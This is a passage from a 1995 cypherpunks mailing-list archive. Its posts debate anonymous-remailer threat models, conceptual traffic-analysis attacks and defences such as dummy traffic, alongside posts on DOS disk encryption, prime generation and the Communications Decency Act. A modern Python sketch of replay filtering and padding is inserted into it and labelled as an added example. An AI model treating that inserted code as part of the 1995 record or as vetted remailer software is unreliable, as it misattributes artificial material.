religious nut with guns.  Or just a nut with guns.  If the government knows
you are using the remailers, and wants to establish that you are using them
to conspire, this is the only way to fake evidence.
 
 
As for hacking PGP, I am convinced that the mixmaster-type remailers
require their own package.  Coming soon.
 
 
> I can see the problem with standard packets in a chaining context, that
> they would shrink slightly in size as each successive remailer stripped
> off its envelope.  Re-encrypting would solve this by providing more
> padding.  OTOH you can actually stick padding into a PGP packet if you
> know what you're doing.  I have a perl script around somewhere which will
> do this.
> 
 
But padding is worthless if Eve runs some of the remailers.  I know I just
changed the threat model, but stay tuned...
 
 
> > The most obvious one: Eve checks messages (in vs out) for matching tails.
> > If the tails match, the messages match.  The only way around this is for
> > the entire message to be wrapped.  Thus, the extropian requirement.  
> 
> It is true that encrypting messages intra-remailer would prevent this
> attack as far as that one remailer in the chain is concerned.  But it
> seems to me that the message still suffers from this attack against the
> remailer network as a whole.  This points up the fundamental problem with
> this form of encrypted reply block.  They are really not secure unless
> the body itself gets transformed at each step as in Chaum's model.
> 
 
This attack fails if the last link encrypts on the way out, since the
session key changes.  Bob still gets the dupe message, Eve gets no info.
There may be another way to handle dupe messages, stay tuned...
 
 
> > When I say that the Mark I remailers are laughably easy to crack, I mean
> > laughably easy.
> 
> None of this is news.  
 
Then why did you say, "Let's not start rumors..."?
 
 
> > Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
> > out.
> That's why Chaum identified one of the main features of a remailer being
> that it would reject duplicates.  Mixmaster does some version of this,
> although that needs improvement to really meet this attack.
> 
 
Not if Chaum encrypts to Bob.  Chaum encrypting to Bob pushes Eve back to
Wei Dai's work.
 
 
> > Alice has been hauled into court.  The Feds claim that she is the one that
> > actually sent messages M1,...Mx to Bob through Chaum, even though these
> > messages have varied From: (and From) lines.  As root, she cannot claim
> > that this is not possible.  OTOH, if Chaum requires a match, the Feds would
> > have to claim that she compromised the secret keys of all the
> > corresponding From: addresses.  Much tougher.
> 
> OTOH, if Alice actually has signed those messages, her jig is up pretty
> good, wouldn't you say?  Do we really want to force people to use the
> nets in a mode in which they can be incriminated like this by a hostile
> government?
> 
 
I suppose that depends on the threat model.  If the gov't has control of
all the remailers, she's toast, except for being able to claim that the
message was forged.  Here, she loses.  In all other models, the gov't gains
only the proof that she used the remailer net.  In and of itself suspicious
(some places and times), but presumably _not_ a hanging offense.
 
 
> > Seriously, if a site is being shadowed, then it is insecure.  It is to our
> > advantage to know this.  You are right that we "don't care" where a message
> > comes from only if we assume that the message _didn't_ come from an LEA.
> > (Or a big corporation.  Some of them probably have the power to do this,
> > too.)
> 
> Hell, Detweiler has the power to do this!  He's spoofed messages plenty
> of times.  How do we know?  Because of remailer logging.  That's the real
> threat, IMO (the logging).
> 
 
I mean the power to spoof a remailer, in the sense of processing messages
for it, possibly altering them.  I admit, with intra-remailer encryption,
this is equivalent to compromising the key.  
 
 
> > If it did, then the remailer net is under attack, and we most
> > definitely _do_ care about that.
> 
> Even if a message comes from a fake address that is hardly evidence of an
> attack by a powerful opponent.  It could just be an extra-paranoid
> legitimate remailer user who doesn't want to extend any more trust than
> necessary.
> 
 
Yes, but...  If the address faked is nzook@bga.com, then I have something
to be upset about, no?
 
 
> I meant to refer to encrypted messages identical in size and otherwise
> opaque, so that your apparent rate of output is constant.
> 
 
Okay, but in practice we need a lot of garbage.
 
 
> > >Do you see your suggestion as protecting against Wei's in/out correlation
> > >attack?  
> >  
> > Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
> > do that.  If Bob receives x messages each tick, 0 to x of which are real,
> > Eve is hosed--if all messages are standard sized & encrypted!.  Eve is even
> > more hosed if the x messages are concatenated & superencrypted.  If Alice
> > sends y messages each tick, Eve is hosed.  Even more so if the messages are
> > concatenated & superencrypted.
> 
> How can Bob arrange to receive a constant number of messages each tick?
 
Every remailer knows to send Bob x messages per tick.  It's right after his
PGP key in the database.
 
 
> Do all his messages come from one remailer?  Or do all of the remailers
> which might send to him check among themselves before sending to him so
> they can mutually know how many fake messages to send?
> 
 
Each remailer does its own work.  The sum of equals is equal.
 
 
> IMO the real solution to the correlation attack is to have a constant
> message generation rate.  That is sufficient.  Solutions to the other
> attacks mentioned in Chaum are described in Chaum.  (This attack was not
> described in Chaum's paper.)
> 
 
But the correlation attack might mean more than just A sending to B.  It
could be B receives message, then commits act X.
 
 
> > >Of course it was Chaum himself in his 1981 paper (which I think is available
> > >from the CP FTP site) who described the duplicate-message attack.  I don't
> > >see that inter-remailing encryption helps much, because the attacker can
> > >still notice that whenever they inject message A, _something_ goes to
> > >Bob.  The real solution, as Chaum pointed out, is that the remailer must
> > >reject duplicate messages, even when separated by days.  Doing this without
> > >keeping a database of all messages ever sent is left as an exercise.
> > >
> >  
> > I disagree.  If identical input to Chaum does not produce identical output
> > to Bob, how does Eve correlate them?  Repeating, she can match the top of
> > the body of messages, so random tails reveal the actual encrypted message,
> > for whatever that is worth.
> 
> I'm not sure what you mean by "matching the top of the body of messages".
> Are you referring to an encrypted reply block, which might be the same
> for two different messages to the same user?  Or are you suggesting that
> messages would have some headers or some other structures at their top
> which would be preserved through a remailer?
> 
 
No.  I was referring to your trust in packing garbage on the end of a pgp
message.  If the headers and bodies are encrypted separately, and the
remailers just tack garbage onto the end of the message, you get 12345xyz
one time, and 12345pqr the second.  Match.
 
 
> > And if Bob receives x packets per tick, or a BIG packet every tick, how does
> > Eve trace it?
> 
> If the input to Bob really can be made constant across the whole remailer
> net then this does seem to largely protect against duplicate-message
> insertion, in conjunction with the intra-remailer encryption.  However it
> would apparently also be necessary for every remailer to send a constant
> number of packets to every other remailer.  Otherwise a bolus of
> duplicates into one remailer would all leave to go to the next remailer
> at once and would show up.  This means that the net as a whole has to
> carry a constant traffic load on all inter-node links, which could mean a
> large cost in bandwidth load.
> 
 
Your analysis, as I see it, is essentially correct.  I think that the total
load can be time-dependent, but should be even across all remailers on each
tick.  We need a lot of garbage in the net in order to cover all types of
attacks/foolish usage.
 
 
> No, of course message size standardization is a necessary step.  This has
> been recognized for 15 years.
> 
 
So why mention it in this context?
 
 
> > >          It's one thing if I send a message along with thousands of
> > >other people, and Bob gets a message along with everyone else.  But if I
> > >send 10 messages and Bob gets 10 from that batch, that fact alone can
> > >help to link us up.  So splitting my big message into 10 standard ones
> > >isn't that great if they're all sent at once.  Ideally you'd want to
> > >dribble them out at some standard rate, a rate at which you always send
> > >a message whether you have something to send or not.  But this may introduce
> > >unacceptable latency.
> >  
> > "Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
> > equal to your average number of real packets per tick, plus 3 standard
> > deviations.  Since you are chaining, the latency of your input will be less
> > than the latency of the remailernet.
> 
> OK, but chances are your average number of real packets per tick is < 1,
> e.g. if a tick is a few hours and you only send one or two messages
> a day.  So when you do need to send that 500KB GIF it's going to take a
> lot of ticks.
> 
 
But I said average plus 3 standard deviations.  If you know you are going
to send GIFs at some point, you make a point of setting your standard that
high.  BTW, I envision a tick period of 30 minutes to an hour.
 
 
> I would sum up by agreeing with several points: the need for standard
> message sizes, and for a standard rate of message output.  I am neutral
> on whether a remailer may want to super-encrypt a message to the next
> link in the chain (whether a remailer or an end user) if it happens to
> have a key handy.  I don't see any harm in this and the remailer
> software will already handle this transparently on the receiving end.
> I disagree with the idea of remailers checking signatures.  I don't
> agree that inter-node remailer encryption provides significantly more
> protection than padding.  I think that encrypted reply blocks are
> unsafe even with inter-node remailer encryption.  See Chaum's paper for
> ways that encrypted reply blocks can be used safely.  We have also had
> some suggestions here for modifications to Chaum's method.  And I don't
> see how you can arrange to receive a constant load from the net without
> a highly centralized system, which would have its own dangers.
> 
> Hal
> 
 
Hopefully, I made my positions on these matters clear.  As I said, I have
new ideas, several of which supersede these.
 
Nathan
 
 
On multiple Request-Remailing-To:'s
 
> I don't follow how requiring pgp wrappers would kill this.  Couldn't
> he create a remailing request to 10 remailers, wrap that in pgp, stick
> on a remailing request to 10 remailers, wrap that... and end up with
> the same effect?
 
> Hal
 
Yeah.  I realised this right after sending it.  Genius that I am.  I guess
you have to limit the number of remailers in the multiples to 1.  Even
then, you could end up with a remailer-based spam.  (joy)  I guess you have
to, as a matter of policy, allow 1 remailer and nothing else or any number
of others.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:09:32 PST
To: cypherpunks@toad.com
Subject: Threat models. [was: Why encrypt intra-remailernet]
Message-ID: <Pine.3.89.9502090648.I21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>    From: Nathan Zook <nzook@bga.com>
> 
>    When I say that the Mark I remailers are laughably easy to crack, I mean
>    laughably easy.
> 
> By whom?  I am hearing a general denunciation of the current remailer
> system.  These blanket denials are false on their face, because they
> are not true in every circumstance.
> 
 
By anyone with the resources to snoop up- and down- stream of all the
remailers.
 
>    The only reason that our systems are actually able to do any good is that
>    our threat model _is not_ an LEA--with government resources, and government
>    patience.
> 
> _Our_ threat model?
> 
> There is not one threat model.  Each person has their own threat model
> and their own desired level of security.  An individual also desires
> more security for some messages than others.  The current remailer
> network is good for some purposes and bad for others.
> 
> Every evaluation of security _must_ include the nature of the security
> desired, because there is no single concept called "security" which is
> the same in every situation.
> 
> Eric
 
Yes, but...  The very act of going to the trouble of using these remailers
means that you are dealing with someone powerful enough to read past forged
From/From: lines.  Does it take that much more to snoop these sites?  My
gut says no.  Everybody harps chaining.  Does snooping take more effort
than compromising?  I think it would be hard indeed to say so.
 
So if we think Eve can compromise some remailers, and/or read past
From/From: faking, we are, I believe, forced to believe that Eve can snoop
all the remailers.  Threat models need to be uniform in the power of the
opponent.
 
Nathan
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:11:02 PST
To: cypherpunks@toad.com
Subject: Mixmaster + T1
Message-ID: <Pine.3.89.9502090624.J21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
 
*** Background
 
Cypherpunk remailers have been very effectively keeping the net.cops at
bay--mostly because the net.cops aren't _real_ cops.  Lance has offered a
standard that goes quite a distance towards defeating the latter opponent.
I hope that my suggestions can close the gap.  The remailers, and their
mailers, use IDEA, RSA, MD5, PGP, and D-H.
 
 
 
*** Threat Model
 
Our attacker, Eve, is a wealthy national government.  Eve has corrupted at
least some of the law enforcement agencies, but not much of the judiciary.
Contact with the remailers has not been outlawed.  Individual use of strong
crypto has not been outlawed.  ( I know this probably violates the equality
of power demand, but...)  Alice and Bob are sending each other messages
through the net, and know that they are being watched.  Eve does not have
the secret (PGP/RSA) keys of anyone she has not explicitly compromised.
 
The historical examples might be Chinese dissidents, Afghan or Nicaraguan
freedom fighters, David Koresh, Randy Weaver, or Mary of Scotland.
 
 
 
*** Goal
 
Our goal is to help Alice and Bob carry on an extended conversation without
Eve being able to produce proof that either one of them actually sent any
real message.  This includes the possibility that on occasion, theirs is the
only real message in the remailer net.  By produce I include manufacture.
Forward security for all involved is preferable.
 
 
 
*** Attack Modes
 
I believe that there are five primary modes of attack:  traffic analyzing
individual remailers, traffic analyzing the remailer net as a whole,
compromising remailers, correlating the reception of messages by Bob or
Alice with their later outside actions, and fabricating messages from Alice
to Bob.
 
 
 
*** Basic Abilities
 
Eve knows all of our protocols, and can convince the Internet that she is
anyone.  She records all traffic into or out of all remailers, as well as
Alice and Bob.  She runs most of the remailers, and can temporarily and
selectively block traffic through the remailers.
 
 
 
*** Attack Methods.
 
I will not redetail the standard attacks which include flushing, spam-
copying, single copying (stuttering), size matching, or We Dai.  I will,
however, detail certain attacks that I believe are either new or have not
been generally discussed.
 
 
** Fabricating Evidence
 
As we have seen with our own government, lack of evidence is a condition
that governments can correct by fiat.  (Randy Weaver)  Alice has to be able
to prove that a message on the Internet "from" her to a remailer did not in
fact originate with her.
 
 
** Sandwiching
 
(This attack may not be possible at this time.  But it is hard to know...)
If Eve owns remailers on either side of another, she may seed "random" data
with particular data in order to determine what IDEA key was used on the
data.
 
 
** Remailer Spoofing
 
Eve can attempt to process messages on a remailer's behalf.
 
 
** Message Body Matching
 
If a copy of a message can be sent through, the first part of the body
(following the headers) can be compared.  If random garbage has been tacked
on by the other remailer, it will be distinguished.  
 
 
 
*** Definitions for Standard
 
Remailers and mailers together are generically called users.  Alice is
sending a message to Bob.
 
All remailers operate on ticks.  At certain GMTs, all remailers process all
of their accumulated messages, then forward them, holding some over for the
next batch.
 
The term message refers to either the final message to be sent to Bob, or
its encrypted counterparts--including padding.  A header is a set of
communications to a remailer, or to Bob.  A message packet is a message
with all of its headers.  A T1 packet is the collection of all message
packets going from one user to another on a given tick, with additional
header information.
 
 
 
*** Standard for Exchanging T1 Packets
 
T1 packets are IDEA encrypted.  The key is exchanged through a DH exchange
which takes place inside previous T1 packets.  The keys are DHed so that
the compromise of one T1 packet does not lead to the compromise of all
subsequent packets.
 
In order to establish the original IDEA keys, a sender would contact a
receiver with a special "origination" packet request.  Such requests would
initiate contact between users, or could be used to establish secure IDEA
tick keys in the event of a failed connection, or compromised key.  This
packet includes a disposable RSA key, which the receiver would use to PGP a
disposable RSA key in return.  IDEA keys for future packets could be passed
through these RSA keys.  The RSA keys would themselves be signed by the
public key associated with each user.
 
 
 
*** The Structure of a T1 Packet
 
T1 packets would include the DH key exchanges for future ticks, a
timestamp, all message packets destined for the receiver this tick, an MD5
of the previous T1 packet received (decrypted), and an MD5 of the rest of
the message, as a checksum.  This could be turned into a signature,
possibly with the timestamp.  If the MD5 from the previously received
packet matches, the copy of the old sent T1 packet is destroyed.  If it is
bad, the old packet is resent, with a different key.
 
 
 
*** Selection of Message Packets to a User
 
Mailers specify a number of message packets that they receive each tick
from various remailers.  If a remailer has more message packets for a
mailer on a given tick than the mailer receives, the extras are held over,
and a notice is sent so that the mailer can determine if he should raise
his limit.  If the number of "real" packets to a user is below his limit,
dummy packets are sent to him through other remailers, on a sliding scale.
 
A user sends the same number of message packets to each remailer every
tick.  There is a minimum number of message packets that a remailer will
send to each other remailer each turn.
 
/* This eliminates the ability to trace a flood of messages, even if they
all took the same path. */
 
Messages being held are flagged with the number of ticks that they have been
held.  There is a maximum number of ticks that a message packet can be held.
 
Mailers send the same number of message packets each tick to each remailer
that they might use.
 
 
 
*** Use of Dummy Message Packets
 
Dummy message packets are used to pad traffic.  Dummy messages are always
sent at least to third party remailers.  The distribution of these third
parties is random.
 
/* If Eve runs some remailers, she can immediately eliminate dummy messages
sent to her machines.  But if these do not originate in the machine that
sent the message, her gain is much weakened.  If Eve controls most of the
remailers, it may be necessary to send dummy messages through three
remailers in order to obscure traffic flow.  If the distribution were flat,
real messages would stand out. */
 
 
 
*** The Structure of a Message Packet
 
All message bodies are standard sized, and have a standard number of
standard sized headers.  The reconstitution of oversized messages is
handled by Bob's client.  The division of oversized messages is handled by
Alice's client.  An exception is made for mail-to-news gateways, to
reconstitute the oversized message at the last remailer.  Such exceptions
include a rough check to insure that the message is either valid ASCII
armour, or some language.
 
The header to a remailer includes the forwarding address, a timestamp, and
the IDEA keys to be used on each other header, as well as the body.  (Each
is different.  See below.) After decrypting, the headers are circulated.
When creating the timestamp for a header number n, Alice uses the time of
the nth tick coming.
 
The top header itself is RSAed with the user's public key.
 
/*  If Eve manages, through a sandwich attack, to divine the IDEA key used
on a header, she can use this to trace the message.  If we include only the
key and an increment, she can get this information if she has two remailers
before the good one.  If we include the key, an increment, and a
permutation of the headers, she can guess the key.  */
 
The header for Bob includes an MD5 of the message, flags in case the
message is oversized, and a timestamp.
 
 
 
*** Elimination of Duplicate Packets
 
An MD5 record is kept of every message, every header, and every T1 packet
received or sent for M ticks.  M is related to the number of headers and
the maximum number of ticks that a message is held--with room for error.
If a match is found, the entire packet is rejected.  If a message arrives
with a timestamp older than M ticks, it is rejected.  If a message arrives
with a timestamp in the future, it is held until that time.
 
 
 
*** Incorporation of Encrypted Reply Blocks
 
Encrypted Reply Blocks would be the PGPed version of a header set.  The
receiver would know the IDEA keys used on the body, and the order, so he
could reverse the operation.  The keys could even be included in the final
header.  It is not possible in this system to allow multiple encrypted
reply block responses without possible compromise of the recipient.
 
 
 
*** Weaknesses
 
Clients are required to be as sophisticated as hosts.  Clients must be able
to handle lots of dummy mail.  Both hosts and clients must have access to
good, secure, random data sources.  Hosts must be able to protect their
data for a period of hours or days.  Hosts and clients need to be able to
protect their DH information.
 
Nathan
 
Flame on!!
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----
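
The per-tick rules in the post above ("Selection of Message Packets to a User" and "Elimination of Duplicate Packets"), worked through as an added example that is not part of the original message or of any remailer's code. The class names, PACKET_SIZE, the notice format and the treatment of packets that reach the hold limit are assumptions; MD5 appears only because the post names it.

```python
import hashlib
import os
import random
from collections import deque

PACKET_SIZE = 64   # assumed standard message-packet size (the post fixes none)


class ReplayFilter:
    """Duplicate elimination: the MD5 of every packet is remembered for M ticks."""

    def __init__(self, m_ticks):
        self.m = m_ticks
        self.expiry = {}   # MD5 digest -> last tick at which it must be remembered
        self.held = []     # (timestamp, packet) pairs stamped in the future

    def receive(self, packet, stamp, now):
        """Return 'accept', 'hold', 'reject-duplicate' or 'reject-stale'."""
        # Forget digests whose packets would now be rejected as stale anyway.
        self.expiry = {d: t for d, t in self.expiry.items() if t >= now}
        digest = hashlib.md5(packet).digest()
        if digest in self.expiry:
            return "reject-duplicate"
        if now - stamp > self.m:
            return "reject-stale"
        # Remember the digest until the timestamp itself expires, so that a
        # future-stamped packet cannot be replayed after its digest is dropped.
        self.expiry[digest] = max(now, stamp) + self.m
        if stamp > now:
            self.held.append((stamp, packet))
            return "hold"
        return "accept"

    def release(self, now):
        """Hand over held packets whose timestamp has arrived."""
        due = [p for s, p in self.held if s <= now]
        self.held = [(s, p) for s, p in self.held if s > now]
        return due


class OutboundLink:
    """One sender-to-recipient link with a fixed number of packets per tick."""

    def __init__(self, quota, max_hold=4):
        self.quota = quota
        self.max_hold = max_hold      # assumed limit on ticks a packet is held
        self.queue = deque()          # entries are [packet, ticks_held]

    def submit(self, packet):
        if len(packet) != PACKET_SIZE:
            raise ValueError("packets must be the standard size")
        self.queue.append([packet, 0])

    def tick(self):
        """Return (batch, notice); the batch always holds exactly `quota` packets."""
        batch = []
        while self.queue and len(batch) < self.quota:
            batch.append(self.queue.popleft()[0])      # oldest real packets first
        real = len(batch)
        while len(batch) < self.quota:
            batch.append(os.urandom(PACKET_SIZE))      # dummy packet as padding
        random.SystemRandom().shuffle(batch)           # position must not mark dummies
        for entry in self.queue:
            entry[1] += 1                              # flag held-over packets
        overdue = sum(1 for _, held in self.queue if held >= self.max_hold)
        # The notice lets the recipient decide whether to raise its limit.
        return batch, {"real": real, "held": len(self.queue), "overdue": overdue}
```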





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 9 Feb 95 05:31:27 PST
To: cypherpunks@toad.com
Subject: Best encryption device driver for MS-DOS?
Message-ID: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Being in the consulting business, I often write prototype software for
clients in Visual Basic as proof-of-concept and also to make sure I
understand the client's needs before I accept a project.  On occasion,
I have to leave my laptop unattended on someone's desk while I go into
meetings with senior management and try to convince them that I know what
I'm talking about and that I'm worth whatever (exorbitant to them) I'm
asking to do their application for them.  I also do volunteer programming
for several volunteer organizations, and it's the same situation - unattended
laptop while I wander off and chat with management to tell them why it
will take so long to do the impossible. ;)

As you might imagine, I have a full suite of programming tools on the laptop,
including MS Office Pro and VB Pro, both of which are worth about $500
apiece - I'd sure hate to lose them to a malicious cracker, or someone who
would like a personal copy of my source code for their own use, or who just
wants to "borrow" my secret key for awhile.

What do people recommend as the solution for this?  Some sort of IDEA-based
or triple-DES-based device driver would seem to be the answer to this, but
I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
one to use.  I like the sound of Michael Sattler's encryption driver for the
Mac, but alas, I'm running MS-DOS :(

Also, if anyone has any suggestions for a similar driver for Linux, I'd
appreciate it - thanks!
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 9 Feb 95 06:02:54 PST
To: root@einstein.ssz.com (root)
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <199502091343.HAA04180@einstein.ssz.com>
Message-ID: <m0rcZRT-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> You leave your laptop turned on and out of your immediate reach? Geesh.
> I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
> was the whole reason I got one.

Well, it's rather tacky to turn off the laptop, unplug it, etc., just to
lug it into a boardroom.  Not impressive.

> > As you might imagine, I have a full suite of programming tools on the laptop,
> > including MS Office Pro and VB Pro, both of which are worth about $500
> > apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> > would like a personal copy of my source code for their own use, or who just
> > wants to "borrow" my secret key for awhile.
> >
> Business must be good, you are more worried about somebody stealing a $500
> dollar program than a several thousand dollar laptop?

Oh, I'm not worried about the laptop walking off, I'm worried about the
software I've written walking off...

> > What do people recommend as the solution for this?  Some sort of IDEA-based
> > or triple-DES-based device driver would seem to be the answer to this, but
> > I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> > one to use.  I like the sound of Michael Sattler's encryption driver for the
> > Mac, but alas, I'm running MS-DOS :(
> > 
> Try Lo-Jak so that when your laptop goes a wanderin' you can find it....:)

I've never had anyone even attempt to rip off the laptop, but I've had people
ask for "free samples" of the prototype code...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 9 Feb 95 05:48:21 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
Message-ID: <199502091343.HAA04180@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Being in the consulting business, I often write prototype software for
> clients in Visual Basic as proof-of-concept and also to make sure I
> understand the client's needs before I accept a project.  On occasion,
> I have to leave my laptop unattended on someone's desk while I go into
> meetings with senior management and try to convince them that I know what
> I'm talking about and that I'm worth whatever (exorbitant to them) I'm
> asking to do their application for them.  I also do volunteer programming
> for several volunteer organizations, and it's the same situation - unattended
> laptop while I wander off and chat with management to tell them why it
> will take so long to do the impossible. ;)
>
You leave your laptop turned on and out of your immediate reach? Geesh.
I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
was the whole reason I got one.
 
> As you might imagine, I have a full suite of programming tools on the laptop,
> including MS Office Pro and VB Pro, both of which are worth about $500
> apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> would like a personal copy of my source code for their own use, or who just
> wants to "borrow" my secret key for awhile.
>
Business must be good, you are more worried about somebody stealing a $500
dollar program than a several thousand dollar laptop?
 
> What do people recommend as the solution for this?  Some sort of IDEA-based
> or triple-DES-based device driver would seem to be the answer to this, but
> I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> one to use.  I like the sound of Michael Sattler's encryption driver for the
> Mac, but alas, I'm running MS-DOS :(
> 
Try Lo-Jak so that when your laptop goes a wanderin' you can find it....:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Thu, 9 Feb 95 08:13:00 PST
To: slowdog@wookie.net
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net>
Message-ID: <199502091612.IAA25397@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

>   > I heard yesterday that someone in the House of Representatives proposed 
>   > an amendment to the new crime bill which was soundly defeated. Turns 
>   > out the Amendment was worded exactly as the Fourth Amendment in the Bill 
>   > 'o Rights. Apparently many a congressman/woman has egg on their face...

>   Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
>   text of the 4th Amendment without attributing it to be such. It was 
>   defeated. Dems then immediately took to the floor of the House accusing 
>   the Repubs of trying to dismantle the Constitution.

so is there a list of names of the people who voted against it? I use
the term "people" very loosely.

actually though, both the democrats and the republicans consider parts
of the constitution to be obsolete. they just differ amongst themselves
as to which part. 

I wish someone would find the elixir of youth and feed it to barry
goldwater.

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Feb 95 08:41:47 PST
To: cypherpunks@toad.com
Subject: Re: Lucky primes--third time's the charm?
In-Reply-To: <Pine.3.89.9502090512.B21224-0100000@lia.bga.com>
Message-ID: <199502091641.IAA12454@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook <nzook@bga.com> writes:

>-----BEGIN PGP SIGNED MESSAGE-----
> 
>The algorithm I posted the second time works, (nice improvement, eh?) but
>is likely to take several thousand years to complete.  And when it does, we
>can expect weak primes.  The enhancement I propose should fix that.
> 

I did not realize before that p was an output of your algorithm, rather
than an input.  That explains better what you were trying to do.  You are
in effect trying to search for a prime such that e's multiplicative
inverse has a lot of 0's.

This looks like it will work pretty well, with the caveat as we discussed
before that going too far with this could make searching for the primes
easier.  But the only obvious attack would be to try to reproduce your
prime-finding algorithm to find a p which divides the modulus n, and that
is basically a sqrt(n) algorithm, which is far from the worst-case attack
we face.  The search space can be reduced by a considerable factor before
it becomes competitive with modern algorithms.

I guess another point is that if i is 2 or 4 then p itself will likely be
0-rich and conceivably there could be some attacks against a modulus
known to be the product of two 0-rich primes even when the primes are not
weak in the normal sense.  (p = (ed-1)/i+1, d is 0-rich, and e has only
2 bits on so ed is likely also to be somewhat 0-rich; dividing by i is
just a shift right if i is 2 or 4, and adding 1 won't make much
difference.)

Restricting i to other numbers would still give p a simple arithmetical
relation to a 0-rich number (i=3 --> p*3 is 0-rich).  Maybe you could
choose a d such that d itself was 0-rich while ed happens not to be
0-rich; this might feel safer since p would have less of an
arithmetical relation to a 0-rich number.

(Admittedly, I don't know of any factoring attacks directly applicable to
0-rich factors but there is at least a superficial similarity to weak
primes and that suggests caution.)

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philippe Nave <pdn@drmail.dr.att.com>
Date: Thu, 9 Feb 95 07:58:30 PST
To: ecarp <ecarp@netcom.com>
Subject: Re: Best encryption device driver for MS-DOS?
Message-ID: <2F3A49A4@mspost.dr.att.com>
MIME-Version: 1.0
Content-Type: text/plain



Ho, cyphernauts!

My $.02 votes for SecureDevice as an MS-DOS encryption mechanism because:
  1) It works within a file (or files) rather than requiring a dedicated
     hard disk partition; you can put up and take down encrypted "drives"
     without wiping out the whole disk drive and repartitioning. (VERY
     handy when you suddenly need to increase the size of your "drive"
     *RIGHT NOW*).
  2) It keeps a regular DOS directory structure within the "drive" file;
     you set up the "drive" one time and then just throw stuff in it at
     will. You can encrypt single files a variety of ways, but then you
     have to manage them all - this way, you just chuck 'em in the safe
     together.
  3) In a pinch, you can move the whole encrypted "drive" from place to
     place - since it's a self-contained data file and is encrypted
     throughout, you can FTP it all over the place as a binary file
     without hurting it.

The only time I've gotten in trouble with it was when I had SmartDrive turned
on for the encrypted "drive" and went down hard; now, I have a SMARTDRV -D:
or whatever in my AUTOEXEC so that SmartDrive won't try to buffer I/O to
the encrypted drive.

My one and only gripe - it won't work under Windows NT 3.5 ! I have to boot
DOS (blech!) to get at the encrypted drive. (Hint, Hint, Hint....)

    -Philippe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 06:07:31 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502090633.WAA08858@netcom2.netcom.com>
Message-ID: <Pine.LNX.3.91.950209090753.8172B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Timothy C. May wrote:

> As scary as S.314 is, I'm not sure it's likely to pass. Unlike the
> Digital Telephony Bill, which was on greased skids, this  one seems to
> have come out of left field. I could be wrong on this, and maybe it's
> got a lot of sponsors, but it sounds like just another Bill that will
> die in committee or fail on the floor.

I would not count on this. The goal of the bill is to combat 
indecency/pornography/obscenity online - the kind of things pols LOVE to 
vote for.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Feb 95 09:10:03 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <ab5f62d802021004dd65@[137.110.24.250]>
Message-ID: <199502091709.JAA15742@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

